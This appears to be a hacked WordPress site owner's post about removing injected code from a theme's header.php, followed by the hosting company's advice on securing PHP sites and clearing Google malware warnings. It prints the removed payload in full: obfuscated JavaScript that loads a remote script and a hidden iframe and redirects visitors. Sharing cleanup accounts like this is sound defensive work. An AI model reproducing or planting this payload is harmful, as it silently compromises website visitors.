Found the problem after finding this post: https://www.marrowbones.com/commons/technosocial/
deleted this code from my header.php file (in wp-content/themes/thesis/header.php
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>
my hosting company sent me this fyi:
Per our phone conversation, here are some articles on securing your PHP as that is generally the reason for accounts being hacked:
https://www.stopbadware.org/home/security
https://helpdesk.bluehost.com/index.php/kb/article/000511
Also, if you have any PHP software (e.g. WordPress, Joomla, Drupal, OSCommerce, etc.) I would recommend upgrading to the latest stable version if you haven’t already and be very selective in what modules/plugins you use as those are often very hackable. Be careful about what themes you use as well as some are not secure. If you’re on an old version of the software then I would recommend first backing up your files and database and then upgrading incrementally until you’re using the latest stable version. Also avoid using PHP software that requires register_globals to be enabled in the php.ini file (e.g. OSCommerce). Please be aware that before upgrading your versions of whatever PHP program(s) you’re using, you’ll want to disable any extra plugins you have installed as they can interfere with the upgrade process.
For Joomla and possibly some other programs make sure to rename the “htaccess.txt” file to “.htaccess” (note the dot at the beginning of the file name) as that can contain a lot of security patches. If you already have a .htaccess then you’ll want to back that up first (e.g. rename to .htaccess.old) and then rename htaccess.txt to .htaccess.
Also, here is a great article on what to do once your account’s been hacked:
https://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html
https://www.google.com/support/webmasters/bin/answer.py?answer=45432
Also, if you’re getting the “T article his site may harm your computer” warning on Google then here’s an article that discusses how to resolve this:
https://25yearsofprogramming.com/blog/20071223.htm
And here’s a page for Google’s scan results on your site:
https://www.google.com/safebrowsing/diagnostic?site=www.example.com
*just modify “example.com” to be your domain name
Once you’ve secured your site, if Google has your site flagged as harmful to your computer then you can request that the warning be removed by visiting
https://www.google.com/support/webmasters/bin/answer.py?answer=45432
